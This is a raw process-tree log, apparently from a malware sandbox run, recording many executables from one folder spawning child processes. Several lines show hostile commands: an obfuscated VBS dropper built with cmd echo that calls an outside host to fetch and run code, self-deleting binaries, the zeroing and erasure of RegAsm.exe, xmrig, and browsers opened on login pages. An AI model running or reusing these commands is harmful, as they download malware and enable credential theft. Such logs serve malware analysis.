"C:\Users\Admin\Desktop\a\win.exe" x -o- -pjryj2023 .\plugin1.rar .\
3⤵
PID:7176

C:\Users\Admin\Desktop\a\marikolock2.1.exe
"C:\Users\Admin\Desktop\a\marikolock2.1.exe"
2⤵
PID:5492

C:\Users\Admin\AppData\Local\Temp\umesd.exe
"C:\Users\Admin\AppData\Local\Temp\umesd.exe"
3⤵
PID:5416

C:\Users\Admin\Desktop\a\EasySup.exe
"C:\Users\Admin\Desktop\a\EasySup.exe"
2⤵
PID:5260

C:\Users\Admin\Desktop\a\updates_installer.exe
"C:\Users\Admin\Desktop\a\updates_installer.exe"
2⤵
PID:216

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\dnrmcundroxcpsfv.exe
"C:\Users\Admin\AppData\Local\Temp\dnrmcundroxcpsfv.exe"
4⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\iwxlwoxsecltgdd.exe
"C:\Users\Admin\AppData\Local\Temp\iwxlwoxsecltgdd.exe"
4⤵
PID:4912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C timeout /T 2 /nobreak >nul & del "C:\Users\Admin\AppData\Local\Temp\iwxlwoxsecltgdd.exe"
5⤵
PID:7308

C:\Windows\system32\timeout.exe
timeout /T 2 /nobreak
6⤵
- Delays execution with timeout.exe
PID:5036

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=65439 "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & erase "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & exit
4⤵
PID:1140

C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\towardlowest.exe
C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\towardlowest.exe
4⤵
PID:5512

C:\Users\Admin\Desktop\a\tus.exe
"C:\Users\Admin\Desktop\a\tus.exe"
2⤵
PID:6896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:7012

C:\Users\Admin\Desktop\a\foto1661.exe
"C:\Users\Admin\Desktop\a\foto1661.exe"
2⤵
PID:6252

C:\Users\Admin\Desktop\a\kung.exe
"C:\Users\Admin\Desktop\a\kung.exe"
2⤵
PID:6292

C:\Users\Admin\Desktop\a\kung.exe
"C:\Users\Admin\Desktop\a\kung.exe"
3⤵
PID:6536

C:\Users\Admin\Desktop\a\kung.exe
"C:\Users\Admin\Desktop\a\kung.exe"
3⤵
PID:1936

C:\Users\Admin\Desktop\a\smss.exe
"C:\Users\Admin\Desktop\a\smss.exe"
2⤵
PID:6180

C:\Users\Admin\Desktop\a\smss.exe
"C:\Users\Admin\Desktop\a\smss.exe"
3⤵
PID:6752

C:\Users\Admin\Desktop\a\sbin22zx.exe
"C:\Users\Admin\Desktop\a\sbin22zx.exe"
2⤵
PID:2864

C:\Users\Admin\Desktop\a\sbin22zx.exe
"C:\Users\Admin\Desktop\a\sbin22zx.exe"
3⤵
PID:2076

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
4⤵
PID:5420

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Desktop\a\sbin22zx.exe"
5⤵
PID:2956

C:\Users\Admin\Desktop\a\ImxyQs.exe
"C:\Users\Admin\Desktop\a\ImxyQs.exe"
2⤵
PID:1116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /release
3⤵
PID:7748

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:9544

C:\Users\Admin\AppData\Local\Temp\V02z6r.exe
"C:\Users\Admin\AppData\Local\Temp\V02z6r.exe"
3⤵
PID:972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /renew
3⤵
PID:10116

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
4⤵
- Gathers network information
PID:712

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
3⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 588
4⤵
- Program crash
PID:9092

C:\Users\Admin\Desktop\a\FX_432661.exe
"C:\Users\Admin\Desktop\a\FX_432661.exe"
2⤵
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
3⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:6924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p="sq048=".":r54="i":y8628="g":k4js7=":":GetO" 1>C:\Users\Public\bjk6l9.vbs"
4⤵
PID:6416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo"
4⤵
PID:5556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")" 1>>C:\Users\Public\bjk6l9.vbs"
4⤵
PID:1528

\??\c:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Public\bjk6l9.vbs
4⤵
PID:5616

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\bjk6l9.vbs"
5⤵
PID:2788

C:\a60\bj3ai.exe
"C:\a60\bj3ai.exe" bj3
6⤵
PID:4776

\??\c:\windows\SysWOW64\attrib.exe
"c:/windows/SysWOW64/attrib.exe"
7⤵
- Views/modifies file attributes
PID:9944

C:\Users\Admin\Desktop\a\newmar.exe
"C:\Users\Admin\Desktop\a\newmar.exe"
2⤵
PID:5436

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
PID:6772

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
PID:3116

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
3⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
4⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
4⤵
PID:10580

C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
3⤵
PID:4408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
4⤵
PID:5964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
3⤵
PID:6988

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\is-ILGJM.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ILGJM.tmp\LzmwAqmV.tmp" /SL5="$307D8,3047247,224768,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
5⤵
PID:3780

C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
3⤵
PID:7040

C:\Users\Admin\Desktop\a\2.exe
"C:\Users\Admin\Desktop\a\2.exe"
2⤵
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5988 -s 1172
3⤵
- Program crash
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5988 -s 1376
3⤵
- Program crash
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5988 -s 976
3⤵
- Program crash
PID:8880

C:\Users\Admin\Desktop\a\nalo.exe
"C:\Users\Admin\Desktop\a\nalo.exe"
2⤵
PID:6920

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 304
3⤵
- Program crash
PID:3844

C:\Users\Admin\Desktop\a\millianozx.exe
"C:\Users\Admin\Desktop\a\millianozx.exe"
2⤵
PID:5516

C:\Users\Admin\Desktop\a\millianozx.exe
"C:\Users\Admin\Desktop\a\millianozx.exe"
3⤵
PID:7624

C:\Users\Admin\Desktop\a\texaszx.exe
"C:\Users\Admin\Desktop\a\texaszx.exe"
2⤵
PID:1220

C:\Users\Admin\Desktop\a\texaszx.exe
"C:\Users\Admin\Desktop\a\texaszx.exe"
3⤵
PID:8016

C:\Users\Admin\Desktop\a\cbchr.exe
"C:\Users\Admin\Desktop\a\cbchr.exe"
2⤵
PID:7096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 800
3⤵
- Program crash
PID:5012

C:\Users\Admin\Desktop\a\boblspsqgegf.exe
"C:\Users\Admin\Desktop\a\boblspsqgegf.exe"
2⤵
PID:3876

C:\Windows\system32\taskkill.exe
taskkill /im chrome.exe /T /F
3⤵
- Kills process with taskkill
PID:564

C:\Windows\system32\taskkill.exe
taskkill /im chrome.exe /T /F
3⤵
- Kills process with taskkill
PID:6168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Desktop\a\boblspsqgegf.exe
3⤵
PID:6564

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:2648

C:\Users\Admin\Desktop\a\newumma.exe
"C:\Users\Admin\Desktop\a\newumma.exe"
2⤵
PID:6332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 1496
3⤵
- Program crash
PID:32

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
PID:1236

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
PID:5560

C:\Users\Admin\Desktop\a\ca.exe
"C:\Users\Admin\Desktop\a\ca.exe"
2⤵
PID:668

C:\Users\Admin\Desktop\a\fra.exe
"C:\Users\Admin\Desktop\a\fra.exe"
2⤵
PID:6372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 792
3⤵
- Program crash
PID:6356

C:\Users\Admin\Desktop\a\bus50.exe
"C:\Users\Admin\Desktop\a\bus50.exe"
2⤵
PID:2548

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\ZN3vB40.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\ZN3vB40.exe
3⤵
PID:6468

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\OJ7jX37.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\OJ7jX37.exe
4⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\cM7YQ04.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\cM7YQ04.exe
5⤵
PID:1856

C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\xv2Es96.exe
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\xv2Es96.exe
6⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\Dt4tB56.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\Dt4tB56.exe
7⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\1yU87zP8.exe
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\1yU87zP8.exe
8⤵
PID:6796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\2Cr2681.exe
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\2Cr2681.exe
8⤵
PID:2132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
9⤵
PID:5860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 544
10⤵
- Program crash
PID:3668

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\3Oe28Zh.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\3Oe28Zh.exe
7⤵
PID:5084

C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\4DG867gK.exe
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\4DG867gK.exe
6⤵
PID:1452

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:7452

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\5LK9wV0.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\5LK9wV0.exe
5⤵
PID:7828

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\6na3fV5.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\6na3fV5.exe
4⤵
PID:7480

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\7jH2BC85.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\7jH2BC85.exe
3⤵
PID:7228

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1B5F.tmp\1B60.tmp\1B61.bat C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\7jH2BC85.exe"
4⤵
PID:2372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
5⤵
PID:3424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:5468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,15458630826015947069,12263737590479546973,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
6⤵
PID:10928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15458630826015947069,12263737590479546973,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
6⤵
PID:10032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
5⤵
PID:6976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,16644769825512078587,9564722767643500231,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
6⤵
PID:7352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
5⤵
PID:2936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x168,0x144,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:1124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
5⤵
PID:10524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:3732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
5⤵
PID:7992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:8496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
5⤵
PID:9580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:8252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
5⤵
PID:10188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:1476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
5⤵
PID:7600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x16c,0x170,0x168,0x174,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:9428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
5⤵
PID:10792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:2792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
5⤵
PID:8724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
6⤵
PID:1040

C:\Users\Admin\Desktop\a\Veeam.Backup.Service.exe
"C:\Users\Admin\Desktop\a\Veeam.Backup.Service.exe"
2⤵
PID:384

C:\Users\Admin\Desktop\a\chungzx.exe
"C:\Users\Admin\Desktop\a\chungzx.exe"
2⤵
PID:6592

C:\Users\Admin\Desktop\a\chungzx.exe
"C:\Users\Admin\Desktop\a\chungzx.exe"
3⤵
PID:6920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
4⤵
PID:9572

C:\Windows\SysWOW64\PING.EXE
PING 127.0.0.1 -n 2
5⤵
- Runs ping.exe
PID:6852

C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
"C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
5⤵
PID:9752

C:\Windows\Microsoft Media Session\Windows Sessions Start.exe
"C:\Windows\Microsoft Media Session\Windows Sessions Start.exe"
6⤵
PID:1924

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
7⤵
PID:7352

C:\Users\Admin\Desktop\a\xmrig.exe
"C:\Users\Admin\Desktop\a\xmrig.exe"
2⤵
PID:5692

C:\Users\Admin\Desktop\a\WatchDog.exe
"C:\Users\Admin\Desktop\a\WatchDog.exe"
2⤵
PID:396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 1352
3⤵
- Program crash
PID:9924

C:\Users\Admin\Desktop\a\plugmanzx.exe
"C:\Users\Admin\Desktop\a\plugmanzx.exe"
2⤵
PID:3048

C:\Users\Admin\Desktop\a\plugmanzx.exe
"C:\Users\Admin\Desktop\a\plugmanzx.exe"
3⤵
PID:8204

C:\Users\Admin\Desktop\a\plugmanzx.exe
"C:\Users\Admin\Desktop\a\plugmanzx.exe"
3⤵
PID:8304

C:\Users\Admin\Desktop\a\damianozx.exe
"C:\Users\Admin\Desktop\a\damianozx.exe"
2⤵
PID:5264

C:\Users\Admin\Desktop\a\damianozx.exe
"C:\Users\Admin\Desktop\a\damianozx.exe"
3⤵
PID:8600

C:\Users\Admin\Desktop\a\damianozx.exe
"C:\Users\Admin\Desktop\a\damianozx.exe"
3⤵
PID:8824

C:\Users\Admin\Desktop\a\ch.exe
"C:\Users\Admin\Desktop\a\ch.exe"
2⤵
PID:7276

C:\Users\Admin\Desktop\a\undergroundzx.exe
"C:\Users\Admin\Desktop\a\undergroundzx.exe"
2⤵
PID:7884

C:\Users\Admin\Desktop\a\undergroundzx.exe
"C:\Users\Admin\Desktop\a\undergroundzx.exe"
3⤵
PID:9804

C:\Users\Admin\Desktop\a\undergroundzx.exe
"C:\Users\Admin\Desktop\a\undergroundzx.exe"
3⤵
PID:8864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8864 -s 2236
4⤵
- Program crash
PID:8976

C:\Users\Admin\Desktop\a\Random.exe
"C:\Users\Admin\Desktop\a\Random.exe"
2⤵
PID:7660

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:5068

